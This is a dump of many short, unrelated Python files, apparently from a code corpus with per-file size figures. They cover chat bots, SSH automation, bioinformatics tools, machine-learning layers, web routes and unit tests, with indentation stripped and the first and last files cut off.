if reg.group('pos') not in aliases:
return
dmm = await Demobot.send_message(msg.author, "DM me a description for " + aliases[reg.group('pos')] + ".")
m = await Demobot.wait_for_message(timeout=600, author=msg.author, channel=dmm.channel)
if not m:
m = "*No description given*"
else:
m = m.content
nested_pop(msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id)
nested_set(Candidate(m, msg.author.id), msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id)
await Demobot.send_message(msg.author, "You are now running.")
await save(None, None, None, overrideperms=True)
else:
await Demobot.send_message(msg.channel, "You must be a citizen!")
add_message_handler(running, r'I\s*(?:(?:want|would\s*like)\s*to\s*run|am\s*running)\s*for\s*(?P<pos>.*?)\Z')
| 1,420 | 480 |
#!/usr/bin/env python3
'''
Force Python3
'''
from __future__ import print_function
from pprint import pprint
from pssh.pssh_client import ParallelSSHClient
from pssh.exceptions import AuthenticationException, \
UnknownHostException, ConnectionErrorException
import pssh.utils
pssh.utils.enable_host_logger()
hosts = ['vm-dc-js00001-dnguyen.svale.netledger.com']
client = ParallelSSHClient(hosts,proxy_host='nx')
try:
print("before run_command")
output = client.run_command('ls -ltrh /home/mkettlewell', stop_on_errors=False)
print("after run_command")
client.join(output)
print(output)
for host in output:
for line in output[host]['stdout']:
print("Host %s - output: %s" % (host, line))
except (AuthenticationException, UnknownHostException, ConnectionErrorException):
print("exception...")
pass
| 861 | 277 |
Port1 = { "pin1" : 33 , "pin2" : 32 , "adc" : 33} #ICSP Cable
Port2 = { "pin1" : 13 , "pin2" : 14 , "adc" : 34} #MP3 Port | 122 | 74 |
'''
Created on 16-10-2012
@author: Jacek Przemieniecki
'''
from unifac.facade import Facade #@UnresolvedImport
class UI(object):
def __init__(self):
self.facade = Facade()
def parse_file(self, f):
""" Opens the file from patch f and executes commands inside"""
with open(f) as raw_file:
line_number = 1
commands = raw_file.readlines()
try:
for line in commands:
self.run_command(line)
line_number += 1
except Exception: # TODO: Exception handling
raise
def run_command(self, line):
"""Available commands:
ADD <smiles> <quantity>
<smiles> - SMILES notation of compound added
<quantity> - amount (in moles) of compound
REMOVE <smiles> <quantity>
<smiles> - SMILES notation of compound removed
<quantity> - amount (in moles) of compound
PRINT
prints calculation results for current solution
RESET
resets the solution"""
command = line.split()[0]
parameters = line.split()[1:3]
if command == "ADD":
self.facade.add_molecule_smiles(parameters[0], float(parameters[1]))
elif command == "REMOVE":
self.facade.add_molecule_smiles(parameters[0], float(-parameters[1]))
elif command == "PRINT":
self.print_result(parameters[0])
elif command == "RESET":
self.facade.reset_solution()
elif command == "TEMPERATURE":
self.facade.set_temperature(float(parameters[0]))
else:
raise Exception() # TODO: Exception handling CommandError("Unknown command: %s" % command)
def print_result(self, iden):
print("Activity coefficient for: ", iden, " ", self.facade.get_coeff(iden))
ui = UI()
while 1:
ui.run_command(input())
| 1,968 | 569 |
from pythonping import ping
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
style.use('fivethirtyeight')
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
xs_min=[0]
ys_min=[5]
def animate(z):
ping_out = ping('8.8.8.8', count = 2)
ping_arr = str(ping_out)[len(str(ping_out))-28:].split(" ")
print(ping_arr)
for i in range(len(ping_arr)):
if len(ping_arr[i]) > 10:
time_min = ping_arr[i].split("/")[0]
print(time_min)
xs_min.append(float(len(xs_min)))
ys_min.append(float(time_min))
#print(xs_min)
#print(ys_min)
ax1.clear()
ax1.plot(xs_min[-50:],ys_min[-50:],linewidth=2)
ani = animation.FuncAnimation(fig, animate, interval=50)
plt.show()
print(xs_min)
| 848 | 350 |
# from cumulusci.robotframework.utils import selenium_retry
# The following decorator is commented out, because with it the
# library gets two extra keywords. I'm not certain if that's what
# should be happening, or if those two keywords are actually just
# helper functions that are accidentially ending up as keywords
# @selenium_retry
class TestLibrary(object):
"""Documentation for the TestLibrary library."""
def library_keyword_one(self):
"""Keyword documentation with *bold* and _italics_"""
return "this is keyword one from TestLibrary.py"
def library_keyword_two(self):
return "this is keyword two from TestLibrary.py"
| 669 | 175 |
#!/usr/bin/env python
'''spellcheck.py - parse source code and spell check comments, strings, or all
tokens.
Usage: find $SRCDIR -name \*.java | spellcheck.py --dict /usr/share/dict/words
Most users will need a large custom dictionary of technical terms, e.g.,
HTTP, malloc, etc. Users may want to pipe output through
"sort | uniq -c | sort -n" to find unusual and often incorrect spellings.
'''
__VERSION__ = 20180615
# TODO: allow compoundwords?
# TODO: bundle standard programming dictionary
# TODO: calculate edit distance from misspellings to likely spellings
# TODO: control word-splitting: camelCase, contractions, hyphenation
# TODO: diff mode for pre-push hooks
# TODO: emit file names and line numbers
# TODO: ignore comments, /* */, //, #
# TODO: ignore hex hashes
# TODO: ignore URLs
# TODO: incremental mode: show new misspellings since last run
# TODO: port to python 3
# TODO: show unusual spellings first (configurable limit?)
# TODO: single- and double-quote strings
# TODO: upper-case letters
# compare with: http://pypi.python.org/pypi/scspell
import argparse
import re
import string
import sys
STRING_CHAR = '"'
def parse_stream(stream, tokenize_all):
'''Parse strings from stream of source code and emit tokenized words, e.g.,
string = "foo bar" -> [foo, bar]
"myString" -> [my, string]
'''
for line in stream:
string = ''
in_string = False
in_backslash = False
last_char = None
for char in line:
if tokenize_all or in_string:
if in_backslash:
in_backslash = False
yield string
string = ''
elif char == '\\':
in_backslash = True
# parse camelCase
# XXX better to do this outside parse_stream?
elif (char.isupper() and last_char is not None and
last_char.isalpha() and not last_char.isupper()):
yield string
string = char
elif char == STRING_CHAR:
in_string = False
yield string
string = ''
else:
string += char
else:
if char == STRING_CHAR:
in_string = True
last_char = char
if len(string) > 0:
yield string
string = ''
translations = string.maketrans(string.ascii_uppercase, string.ascii_lowercase)
deletions = string.digits + string.punctuation + string.whitespace
def populate_dictionary(filename, dictionary):
with open(filename, 'r') as f:
for word in f:
dictionary.add(word.translate(translations, deletions))
def main():
parser = argparse.ArgumentParser(
description='spell check strings in source code')
parser.add_argument('--dict', dest='dictionaries',
action='append', required=True)
parser.add_argument('--tokenize-all', dest='tokenize_all',
action='store_true', default=False)
args = parser.parse_args(sys.argv[1:])
all_dictionaries = set()
for wordlist in args.dictionaries:
populate_dictionary(wordlist, all_dictionaries)
exit_code = 0
for filename in sys.stdin:
filename = filename[:-1]
with open(filename, 'r') as f:
for my_string in parse_stream(f, args.tokenize_all):
# TODO: second parser!
for word in re.split("[^A-Za-z]", my_string):
cword = word.translate(translations, deletions)
if cword == '':
continue
if cword not in all_dictionaries:
exit_code = 1
print(word)
sys.exit(exit_code)
if __name__ == '__main__':
main()
| 3,875 | 1,075 |
import numpy as np
from collections import deque
from experience_replay import *
from brain import *
from agent import *
from Hyperparameters import *
class Environment:
def __init__(self,x,y):
param = Hyperparameters()
self.x = x
self.y = y
self.buff = deque(maxlen= param.CHANNEL_NUM)
def reset(self):
self.map = np.zeros([self.x,self.y])
self.x_pos = 0
self.y_pos = np.random.randint(0,self.y)
self.map[self.x_pos,self.y_pos] = 1
self.bar_init = np.random.randint(0,self.y-7)
self.bar = [self.bar_init,self.bar_init+5]
self.map[self.x-1,self.bar[0]:self.bar[1]] = 1
self.buff.append(self.map)
self.buff.append(self.map)
self.buff.append(self.map)
return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu')
def step(self,action):
self.x_pos += 1
done = False
reward = 0
if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 1:
reward = 5
done = True
if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 0:
reward = -1
done = True
if action == 0:
if self.bar[0] == 0:
pass
else:
self.bar[0] -= 1
self.bar[1] -= 1
if action == 1:
if self.bar[1] == self.y:
pass
else:
self.bar[1] += 1
self.bar[0] += 1
if action == 2:
pass
self.map = np.zeros([self.x,self.y])
self.map[self.x_pos,self.y_pos] = 1
self.map[self.x-1,self.bar[0]:self.bar[1]] = 1
self.buff.append(self.map)
return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu'),reward,done
| 1,981 | 695 |
# -*- coding: utf-8 -*-
# __author__ = "wynterwang"
# __date__ = "2020/9/18"
from __future__ import absolute_import
from datetime import datetime
from celery import states
from restful_falcon.core.db.model import Column
from restful_falcon.core.db.model import Model
from restful_falcon.core.db.model import Sequence
from restful_falcon.core.db.type import DateTime
from restful_falcon.core.db.type import Integer
from restful_falcon.core.db.type import LargeBinary
from restful_falcon.core.db.type import PickleType
from restful_falcon.core.db.type import String
from restful_falcon.core.db.type import Text
class Task(Model):
"""
Task result/status.
"""
__tablename__ = "celery_taskmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = Column(Integer, Sequence("task_id_sequence"), primary_key=True, autoincrement=True)
task_id = Column(String(155), unique=True)
status = Column(String(50), default=states.PENDING)
result = Column(PickleType, nullable=True)
date_done = Column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True)
traceback = Column(Text, nullable=True)
class TaskExtended(Task):
"""
For the extend result.
"""
__tablename__ = "celery_taskmeta"
__table_args__ = {"sqlite_autoincrement": True, "extend_existing": True}
name = Column(String(155), nullable=True)
args = Column(LargeBinary, nullable=True)
kwargs = Column(LargeBinary, nullable=True)
worker = Column(String(155), nullable=True)
retries = Column(Integer, nullable=True)
queue = Column(String(155), nullable=True)
class TaskSet(Model):
"""
TaskSet result.
"""
__tablename__ = "celery_tasksetmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = Column(Integer, Sequence("taskset_id_sequence"), autoincrement=True, primary_key=True)
taskset_id = Column(String(155), unique=True)
result = Column(PickleType, nullable=True)
date_done = Column(DateTime, default=datetime.utcnow, nullable=True)
| 2,040 | 691 |
from mirari.mirari.urls import *
from django.views.generic.base import RedirectView
from .views import *
from .vars import *
app_name = APP
urlpatterns = [
path('sv/', sv__Sellpoint__TemplateView.as_view(), name='sv__Sellpoint__TemplateView'),
path('api/SellpointApiView/<slug:app>/<slug:action>/<slug:model>/', Sellpoint__ApiView.as_view(), name='Sellpoint__ApiView'),
path('SVbarcodeScanner/', SVbarcodeScanner__TemplateView.as_view(), name='SVbarcodeScanner__TemplateView'),
path('TicketInvoiceMX/', TicketInvoiceMX__TemplateView.as_view(), name='TicketInvoiceMX__TemplateView'),
path('GetTicketQR/', GetTicketQR__TemplateView.as_view(), name='GetTicketQR__TemplateView'),
] | 700 | 241 |
# -*- coding:utf-8 -*-
class People(object):
pass
class People1(object):
def __str__(self):
return "123"
p = People()
print p
p1 = People1()
print p1 | 168 | 67 |
import numpy as np
import cntk as C
from cntk.layers.blocks import _INFERRED
def OptimizedRnnStack(hidden_dim, num_layers=1, recurrent_op='gru', bidirectional=False, use_cudnn=True, name=''):
if use_cudnn:
W = C.parameter(_INFERRED + (hidden_dim,), init=C.glorot_uniform())
def func(x):
return C.optimized_rnnstack(x, W, hidden_dim, num_layers, bidirectional, recurrent_op=recurrent_op, name=name)
return func
else:
def func(x):
return C.splice(
C.layers.Recurrence(C.layers.GRU(hidden_dim))(x),
C.layers.Recurrence(C.layers.GRU(hidden_dim), go_backwards=True)(x),
name=name)
return func
def seq_loss(logits, y):
prob = C.sequence.softmax(logits)
return -C.log(C.sequence.last(C.sequence.gather(prob, y)))
'''
def attention_pooling(inputs, inputs_weights, decode, decode_weights, keys):
"""
inputs: shape=(dim, n)
inputs_weight: shape=(dim, dim)
decode: shape=(1, dec_dim)
decode_weights: shape=(dim, dec_dim)
keys: shape=(1, dim)
"""
w_in = C.times(inputs_weights ,inputs) #shape=(dim, n)
decode = C.transpose(decode, perm=(1,0))
w_dec = C.times(decode_weights ,decode) #shape=(dim, dim)
S = C.tanh(C.plus(C.transpose(w_in, perm=(1,0)), C.transpose(w_dec, perm=(1,0)))) #shape=(n, dim)
S = C.times(S, C.transpose(keys, perm=(1,0))) #shape=(n)
S = C.ops.sequence.softmax(S, name="softmax")
attention = C.transpose(C.times(inputs ,S), perm=(1,0))
return attention
'''
def attention_pooling(inputs, inputs_mask, inputs_weights, decode, decode_weights, keys):
"""
inputs: shape=(n, dim)
inputs_weight: shape=(dim, dim)
decode: shape=(1, dec_dim)
decode_weights: shape=(dec_dim, dim)
keys: shape=(dim, 1)
"""
w_in = C.times(inputs, inputs_weights) #shape=(n, dim)
w_dec = C.times(decode, decode_weights) #shape=(dim, 1)
S = C.tanh(w_in + C.sequence.broadcast_as(w_dec, w_in)) #shape=(n, dim)
S = C.element_select(inputs_mask, S, C.constant(-1e+30))
S = C.times(S, keys) #shape=(n)
S = C.ops.sequence.softmax(S, name="softmax")
attention = C.reduce_sum(inputs * S, axis=0)
return attention
'''
def question_pooling(inputs, inputs_dim):
Wp = C.parameter(shape=(inputs_dim,inputs_dim))
Vp = C.parameter(shape=(inputs_dim, 1))
outputs_w = C.times(C.tanh(C.times(inputs, Wp)), Vp)
# Vp = C.parameter(shape=(inputs_dim))
# outputs_w = C.sequence.reduce_sum(C.tanh(C.times(inputs, Wp)) * Vp, 1)
outputs_w = C.sequence.softmax(inputs)
outputs = outputs_w * inputs
return outputs
def att_weight(h_enc, h_dec, inputs_dim):
w_enc = C.parameter(shape=(inputs_dim,inputs_dim))
w_dec = C.parameter(shape=(inputs_dim,inputs_dim))
wh_enc = C.times(h_enc, w_enc)
wh_dec = C.times(h_dec, w_dec)
s_t = C.tanh(wh_dec + wh_enc)
v_t = C.parameter(shape=(inputs_dim, 1))
s_t = C.times(s_t ,v_t)
# v_t = C.parameter(shape=(inputs_dim))
# s_t = C.sequence.reduce_sum(s_t * v_t, 1)
wh_weight = C.sequence.softmax(s_t)
return wh_weight
'''
'''
def question_pooling(inputs, inputs_dim):
inputs_w, inputs_mask = C.sequence.unpack(inputs, padding_value=0).outputs
Wp = C.parameter(shape=(inputs_dim,inputs_dim))
Vp = C.parameter(shape=(inputs_dim,1))
outputs_w = C.times(C.tanh(C.times(inputs_w, Wp)), Vp)
outputs_w = C.softmax(C.element_select(inputs_mask, outputs_w, C.constant(-1e+30)), axis=0)
outputs = outputs_w * inputs_w
outputs = C.reduce_sum(outputs, 0)
return outputs
def att_weight(h_enc, h_dec, inputs_dim):
h_enc_w, h_enc_mask = C.sequence.unpack(h_enc, padding_value=0).outputs
w_enc = C.parameter(shape=(inputs_dim, inputs_dim))
w_dec = C.parameter(shape=(inputs_dim, inputs_dim))
v_t = C.parameter(shape=(inputs_dim))
wh_enc = C.times(h_enc_w, w_enc)
wh_dec = C.times(h_dec, w_dec)
s_t = C.tanh(C.sequence.broadcast_as(wh_dec, wh_enc) + wh_enc)
s_t = C.element_select(h_enc_mask, s_t, C.constant(-1e+30))
s_t = C.reduce_sum(s_t * v_t, 1)
wh_weight = C.softmax(s_t)
return wh_weight
'''
def question_pooling(inputs, inputs_dim):
outputs_w = C.layers.Dense(1, activation=C.tanh, name='out_start')(inputs)
outputs_w = C.sequence.softmax(outputs_w)
outputs = C.sequence.reduce_sum(outputs_w * inputs)
return outputs
def attention_weight(h_enc, h_dec, inputs_dim):
enc = C.layers.Dense(inputs_dim, name='out_start')(h_enc)
dec = C.sequence.broadcast_as(C.layers.Dense(inputs_dim, name='out_start')(h_dec), enc)
att_weight = C.layers.Dense(1, name='out_start')(C.tanh(enc+dec))
att_weight = C.sequence.softmax(att_weight)
return att_weight
def all_spans_loss(start_logits, start_y, end_logits, end_y):
# this works as follows:
# let end_logits be A, B, ..., Y, Z
# let start_logits be a, b, ..., y, z
# the tricky part is computing log sum (i<=j) exp(start_logits[i] + end_logits[j])
# we break this problem as follows
# x = logsumexp(A, B, ..., Y, Z), logsumexp(B, ..., Y, Z), ..., logsumexp(Y, Z), Z
# y = a + logsumexp(A, B, ..., Y, Z), b + logsumexp(B, ..., Y, Z), ..., y + logsumexp(Y, Z), z + Z
# now if we exponentiate each element in y we have all the terms we need. We just need to sum those exponentials...
# logZ = last(sequence.logsumexp(y))
x = C.layers.Recurrence(C.log_add_exp, go_backwards=True, initial_state=-1e+30)(end_logits)
y = start_logits + x
logZ = C.layers.Fold(C.log_add_exp, initial_state=-1e+30)(y)
return logZ - C.sequence.last(C.sequence.gather(start_logits, start_y)) - C.sequence.last(C.sequence.gather(end_logits, end_y))
def seq_hardmax(logits):
seq_max = C.layers.Fold(C.element_max, initial_state=C.constant(-1e+30, logits.shape))(logits)
s = C.equal(logits, C.sequence.broadcast_as(seq_max, logits))
s_acc = C.layers.Recurrence(C.plus)(s)
return s * C.equal(s_acc, 1) # only pick the first one
class LambdaFunc(C.ops.functions.UserFunction):
def __init__(self,
arg,
when=lambda arg: True,
execute=lambda arg: print((len(arg), arg[0].shape,) if type(arg) == list else (1, arg.shape,), arg),
name=''):
self.when = when
self.execute = execute
super(LambdaFunc, self).__init__([arg], name=name)
def infer_outputs(self):
return [C.output_variable(self.inputs[0].shape, self.inputs[0].dtype, self.inputs[0].dynamic_axes)]
def forward(self, argument, device=None, outputs_to_retain=None):
if self.when(argument):
self.execute(argument)
return None, argument
def backward(self, state, root_gradients):
return root_gradients
def clone(self, cloned_inputs):
return self.__init__(*cloned_inputs)
def print_node(v):
return C.user_function(LambdaFunc(v)) | 7,178 | 2,844 |
#!/usr/bin/env python
#Copyright (C) 2013 by Ngan Nguyen
#
#Released under the MIT license, see LICENSE.txt
"""
Make "hub.txt", "groups.txt", files that are required by AssemblyHub
Also prepare description.html files
"""
import os, sys
from sonLib.bioio import system
from optparse import OptionGroup
from hal.assemblyHub.assemblyHubCommon import getProperName
from Bio import Phylo
from hal.assemblyHub.treeCommon import isBinaryTree
def writeDescriptionFile(genome, outdir):
filename = os.path.join(outdir, "description.html")
f = open(filename, 'w')
f.write("%s\n" %genome)
f.close()
return
def writeTrackDb_composite_html(file, treeFile):
f = open(file, 'w')
#HACK:
#huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/ecoli/hub/TEST2"
huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/birds/birds2"
basename = os.path.basename(treeFile)
f.write("<img src=\"%s/%s\">\n" %(huburl, basename))
f.close()
def writeTrackDb_compositeStart(f, shortLabel, longLabel, bbdirs, bwdirs, genomes, properName, url, img):
#Composite track includes all annotations in BED & WIGGLE formats, their lifted-over tracks, and Snake tracks
f.write("track hubCentral\n")
f.write("compositeTrack on\n")
f.write("shortLabel %s\n" %shortLabel)
f.write("longLabel %s\n" %longLabel)
f.write("group comphub\n")
bedtracktypes = [os.path.basename(b.rstrip('/')) for b in bbdirs]
bedstr = " ".join(["%s=%s" %(item, item) for item in bedtracktypes])
wigtracktypes = [os.path.basename(b.rstrip('/')) for b in bwdirs]
wigstr = " ".join(["%s=%s" %(item, item) for item in wigtracktypes])
f.write("subGroup1 view Track_Type Snake=Alignments %s %s\n" %(bedstr, wigstr))
genomeStr = " ".join(["%s=%s" %(g, getProperName(g, properName)) for g in genomes])
f.write("subGroup2 orgs Organisms %s\n" %genomeStr)
f.write("dragAndDrop subTracks\n")
f.write("#allButtonPair on\n")
#f.write("sortOrder view=+ orgs=+\n")
f.write("dimensions dimensionX=view dimensionY=orgs\n")
f.write("noInherit on\n")
f.write("priority 0\n")
f.write("centerLabelsDense on\n")
f.write("visibility full\n")
f.write("html ../documentation/hubCentral\n")
if url and img:
imgurl = os.path.join(url, os.path.basename(img))
f.write("treeImage %s\n" %imgurl)
f.write("type bigBed 3\n")
f.write("\n")
def writeTrackDb_compositeSubTrack(f, name, visibility):
f.write("\ttrack hubCentral%s\n" %name)
f.write("\tshortLabel %s\n" %name)
f.write("\tview %s\n" %name)
f.write("\tvisibility %s\n" %visibility)
f.write("\tsubTrack hubCentral\n")
f.write("\n")
def writeGroupFile(outdir, hubLabel, annotations):
filename = os.path.join(outdir, "groups.txt")
f = open(filename, 'w')
f.write("name user\n")
f.write("label Custom\n")
f.write("priority 1\n")
f.write("defaultIsClosed 1\n")
f.write("\n")
f.write("name map\n")
f.write("label Mapping\n")
f.write("priority 2\n")
f.write("defaultIsClosed 0\n")
f.write("\n")
f.write("name comphub\n")
f.write("label %s\n" % hubLabel)
f.write("priority 3\n")
f.write("defaultIsClosed 0\n")
f.write("\n")
f.write("name snake\n")
f.write("label Alignment Snakes\n")
f.write("priority 3\n")
f.write("defaultIsClosed 0\n")
f.write("\n")
for annotation in annotations:
f.write("name annotation%s\n" %annotation)
f.write("label %s Annotations\n" % annotation.capitalize() )
f.write("priority 3\n")
f.write("defaultIsClosed 1\n")
f.write("\n")
f.write("name exp\n")
f.write("label Experimental\n")
f.write("priority 4\n")
f.write("defaultIsClosed 1\n")
f.write("\n")
f.close()
def writeHubFile(outdir, options):
hubfile = os.path.join(outdir, "hub.txt")
f = open(hubfile, "w")
f.write("hub %s\n" %options.hubLabel)
f.write("shortLabel %s\n" %options.shortLabel)
f.write("longLabel %s\n" %options.longLabel)
f.write("genomesFile genomes.txt\n")
f.write("email %s\n" %options.email)
f.close()
#=========== READ FILES ===========
def readList(file):
items = []
f = open(file, 'r')
for line in f:
items.append(line.strip())
f.close()
return items
def readRename(file):
name2new = {}
f = open(file, 'r')
for line in f:
line = line.strip()
if len(line) == 0 or line[0] == "#":
continue
items = line.split('\t')
if len(items) >=2:
name2new[items[0]] = items[1]
f.close()
return name2new
#=========== OPTIONS =============
def addHubOptions(parser):
group = OptionGroup(parser, "HUB INFORMATION")
group.add_option('--hub', dest='hubLabel', default='myHub', help='a single-word name of the directory containing the track hub files. Not displayed to hub users. Default=%default')
group.add_option('--shortLabel', dest='shortLabel', default='my hub', help='the short name for the track hub. Suggested maximum length is 17 characters. Displayed as the hub name on the Track Hubs page and the track group name on the browser tracks page. Default=%default')
group.add_option('--longLabel', dest='longLabel', default='my hub', help='a longer descriptive label for the track hub. Suggested maximum length is 80 characters. Displayed in the description field on the Track Hubs page. Default=%default')
group.add_option('--email', dest='email', default='NoEmail', help='the contact to whom questions regarding the track hub should be directed. Default=%default')
group.add_option('--genomes', dest='genomes', help='File specified list of genomes to make browser for. If specified, only create browsers for these genomes in the order provided by the list. Otherwise create browsers for all genomes in the input hal file')
group.add_option('--rename', dest='rename', help='File that maps halfile genomeNames to names displayed on the browser. Format: <halGenomeName>\\t<genomeNameToDisplayOnBrowser>. Default=%default')
group.add_option('--tree', dest='treeFile', help='Newick binary tree. The order of the tracks and the default track layout will be based on this tree if option "genomes" is not specified. If not specified, try to extract the newick tree from the input halfile.')
group.add_option('--url', dest='url', help='Public url of the hub location')
group.add_option('--twobitdir', dest='twobitdir', help='Optional. Directory containing the 2bit files of each genomes. Default: extract from the input hal file.')
parser.add_option_group(group)
def checkHubOptions(parser, options):
if options.genomes:
options.genomes = readList(options.genomes)
options.properName = {}
if options.rename and os.path.exists(options.rename):
options.properName = readRename(options.rename)
options.treeFig = None
options.leaves = None
options.tree = None
if options.treeFile and not os.path.exists(options.treeFile):
parser.error("The tree file %s does not exist.\n" %options.tree)
elif options.treeFile:
tree = Phylo.read(options.treeFile, 'newick')
if isBinaryTree(tree):
options.tree = tree
else:
sys.stderr.write("Warnning: tree %s is not a binary tree. Will be ignored!" %options.treeFile)
| 7,400 | 2,547 |
"""The core elements of sqlfluff."""
# flake8: noqa: F401
# Config objects
from sqlfluff.core.config import FluffConfig
# Public classes
from sqlfluff.core.linter import Linter
from sqlfluff.core.parser import Lexer, Parser
# Dialect introspection
from sqlfluff.core.dialects import dialect_selector, dialect_readout
# All of the errors.
from sqlfluff.core.errors import (
SQLBaseError,
SQLTemplaterError,
SQLLexError,
SQLParseError,
SQLLintError,
)
| 475 | 161 |
"""
Rewrite of rgFastQC.py for Version 0.11.2 of FastQC.
Changes implemented from tmcgowan at
https://testtoolshed.g2.bx.psu.edu/view/tmcgowan/fastqc
and iuc at https://toolshed.g2.bx.psu.edu/view/iuc/fastqc
with minor changes and bug fixes
SYNOPSIS
rgFastQC.py -i input_file -j input_file.name -o output_html_file [-d output_directory]
[-f fastq|bam|sam] [-n job_name] [-c contaminant_file] [-e fastqc_executable]
EXAMPLE (generated by Galaxy)
rgFastQC.py -i path/dataset_1.dat -j 1000gsample.fastq -o path/dataset_3.dat -d path/job_working_directory/subfolder
-f fastq -n FastQC -c path/dataset_2.dat -e fastqc
"""
import bz2
import glob
import gzip
import mimetypes
import optparse
import os
import re
import shutil
import subprocess
import tempfile
import zipfile
class FastQCRunner(object):
def __init__(self, opts=None):
'''
Initializes an object to run FastQC in Galaxy. To start the process, use the function run_fastqc()
'''
# Check whether the options are specified and saves them into the object
assert opts is not None
self.opts = opts
def prepare_command_line(self):
'''
Develops the Commandline to run FastQC in Galaxy
'''
# Check whether a given file compression format is valid
# This prevents uncompression of already uncompressed files
infname = self.opts.inputfilename
linf = infname.lower()
informat = self.opts.informat
trimext = False
# decompression at upload currently does NOT remove this now bogus ending - fastqc will barf
# patched may 29 2013 until this is fixed properly
ftype = mimetypes.guess_type(self.opts.input)
if linf.endswith('.gz') or linf.endswith('.gzip') or ftype[-1] == "gzip" or informat.endswith('.gz'):
f = gzip.open(self.opts.input)
try:
f.readline()
ftype = ['gzip']
except Exception:
trimext = True
f.close()
elif linf.endswith('bz2') or informat.endswith('.bz2'):
f = bz2.BZ2File(self.opts.input, 'r')
try:
ftype = ['bzip2']
f.readline()
except Exception:
trimext = True
f.close()
elif linf.endswith('.zip'):
if not zipfile.is_zipfile(self.opts.input):
trimext = True
if trimext:
f = open(self.opts.input)
try:
f.readline()
except Exception:
raise Exception("Input file corruption, could not identify the filetype")
infname = os.path.splitext(infname)[0]
# Replace unwanted or problematic charaters in the input file name
self.fastqinfilename = re.sub(r'[^a-zA-Z0-9_\-\.]', '_', os.path.basename(infname))
# check that the symbolic link gets a proper ending, fastqc seems to ignore the given format otherwise
if 'fastq' in self.opts.informat:
# with fastq the .ext is ignored, but when a format is actually passed it must comply with fastqc's
# accepted formats..
self.opts.informat = 'fastq'
elif not self.fastqinfilename.endswith(self.opts.informat):
self.fastqinfilename += '.%s' % self.opts.informat
# Build the Commandline from the given parameters
command_line = [opts.executable, '--outdir %s' % self.opts.outputdir]
if self.opts.contaminants is not None:
command_line.append('--contaminants %s' % self.opts.contaminants)
if self.opts.limits is not None:
command_line.append('--limits %s' % self.opts.limits)
command_line.append('--quiet')
command_line.append('--extract') # to access the output text file
if ftype[-1] == 'gzip':
self.fastqinfilename += '.gz'
elif ftype[-1] == 'bzip2':
self.fastqinfilename += '.bz2'
else:
command_line.append('-f %s' % self.opts.informat)
command_line.append(self.fastqinfilename)
self.command_line = ' '.join(command_line)
def copy_output_file_to_dataset(self):
'''
Retrieves the output html and text files from the output directory and copies them to the Galaxy output files
'''
# retrieve html file
result_file = glob.glob(self.opts.outputdir + '/*html')
with open(result_file[0], 'rb') as fsrc:
with open(self.opts.htmloutput, 'wb') as fdest:
shutil.copyfileobj(fsrc, fdest)
# retrieve text file
text_file = glob.glob(self.opts.outputdir + '/*/fastqc_data.txt')
with open(text_file[0], 'rb') as fsrc:
with open(self.opts.textoutput, 'wb') as fdest:
shutil.copyfileobj(fsrc, fdest)
def run_fastqc(self):
'''
Executes FastQC. Make sure the mandatory import parameters input, inputfilename, outputdir and htmloutput have been specified in the options
'''
# Create a log file
dummy, tlog = tempfile.mkstemp(prefix='rgFastQC', suffix=".log", dir=self.opts.outputdir)
sout = open(tlog, 'w')
self.prepare_command_line()
sout.write(self.command_line)
sout.write('\n')
sout.write("Creating symlink\n") # between the input (.dat) file and the given input file name
os.symlink(self.opts.input, self.fastqinfilename)
sout.write("check_call\n")
subprocess.check_call(self.command_line, shell=True)
sout.write("Copying working %s file to %s \n" % (self.fastqinfilename, self.opts.htmloutput))
self.copy_output_file_to_dataset()
sout.write("Finished")
sout.close()
if __name__ == '__main__':
op = optparse.OptionParser()
op.add_option('-i', '--input', default=None)
op.add_option('-j', '--inputfilename', default=None)
op.add_option('-o', '--htmloutput', default=None)
op.add_option('-t', '--textoutput', default=None)
op.add_option('-d', '--outputdir', default="/tmp/shortread")
op.add_option('-f', '--informat', default='fastq')
op.add_option('-n', '--namejob', default='rgFastQC')
op.add_option('-c', '--contaminants', default=None)
op.add_option('-l', '--limits', default=None)
op.add_option('-e', '--executable', default='fastqc')
opts, args = op.parse_args()
assert opts.input is not None
assert opts.inputfilename is not None
assert opts.htmloutput is not None
if not os.path.exists(opts.outputdir):
os.makedirs(opts.outputdir)
fastqc_runner = FastQCRunner(opts)
fastqc_runner.run_fastqc()
| 6,698 | 2,107 |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Unit tests for pagination classes."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from google.appengine.ext import testbed
from framework import exceptions
from framework import paginate
from testing import testing_helpers
from proto import secrets_pb2
class PageTokenTest(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_memcache_stub()
self.testbed.init_datastore_v3_stub()
def testGeneratePageToken_DiffRequests(self):
request_cont_1 = secrets_pb2.ListRequestContents(
parent='same', page_size=1, order_by='same', query='same')
request_cont_2 = secrets_pb2.ListRequestContents(
parent='same', page_size=2, order_by='same', query='same')
start = 10
self.assertNotEqual(
paginate.GeneratePageToken(request_cont_1, start),
paginate.GeneratePageToken(request_cont_2, start))
def testValidateAndParsePageToken(self):
request_cont_1 = secrets_pb2.ListRequestContents(
parent='projects/chicken', page_size=1, order_by='boks', query='hay')
start = 2
token = paginate.GeneratePageToken(request_cont_1, start)
self.assertEqual(
start,
paginate.ValidateAndParsePageToken(token, request_cont_1))
def testValidateAndParsePageToken_InvalidContents(self):
request_cont_1 = secrets_pb2.ListRequestContents(
parent='projects/chicken', page_size=1, order_by='boks', query='hay')
start = 2
token = paginate.GeneratePageToken(request_cont_1, start)
request_cont_diff = secrets_pb2.ListRequestContents(
